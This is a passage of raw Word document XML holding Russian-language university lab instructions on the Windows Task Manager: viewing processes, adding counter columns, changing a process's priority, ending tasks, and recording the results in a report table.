        <w:t xml:space="preserve">, как правило, является наиболее часто используемым компонентом ОС, предназначенным для диагностики и мониторинга основных аппаратно-программных ресурсов системы, таких как центрального процессора, оперативной памяти, системных процессов. В частности, этот модуль позволяет управлять приложениями и процессами в оперативной памяти, снимать их с выполнения и назначать новое значение класса приоритета. Разверните окно системного модуля </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и последовательно ознакомьтесь со всеми его вкладками и меню. Выполните следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• на вкладках </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приложения</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процессы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> обратите внимание на количество работающих приложений и активных процессов,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• рядом с системным модулем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> разверните модуль </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения о системе</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и откройте категорию </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполняемые задачи</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в классе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программная среда</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• в меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вид</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в модуле </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> добавьте следующие столбцы счетчиков: </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>память – максимум</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объем виртуальной памяти</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>базовый приоритет</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>счетчик потоков</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• в модуле </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> измените базовый приоритет процесса Dxdiag.exе на приоритет реального времени, перейдите в окно модуля </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения о системе</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, в меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вид</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> обновите системную информацию и обратите внимание на то, как изменилось значение в столбце </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приоритет</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в категории </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполняемые задачи</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• на вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приложения</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> снимите с выполнения задачи </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения о системе</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Средства диагностики DirectX</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а на вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процессы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> завершите процесс Taskmgr.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. При выполнении заданий секции используйте следующие инструкции:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• перенесите последовательность выполняемых действий по каждому из пунктов 1-5 в отчет (возможно приведение графических фрагментов, сделанных с экрана, в качестве демонстрационного материала),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• результаты ознакомления с возможностями системного модуля </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> занесите в таблицы 1 и 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• сделайте вывод о проделанной работе и запишите его в отчет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 1. Результаты ознакомления с </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчером задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>№ п.п. Общая системная информация Количество</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 Работающих приложений:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 Активных процессов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 Активных потоков:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 Дескрипторов:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
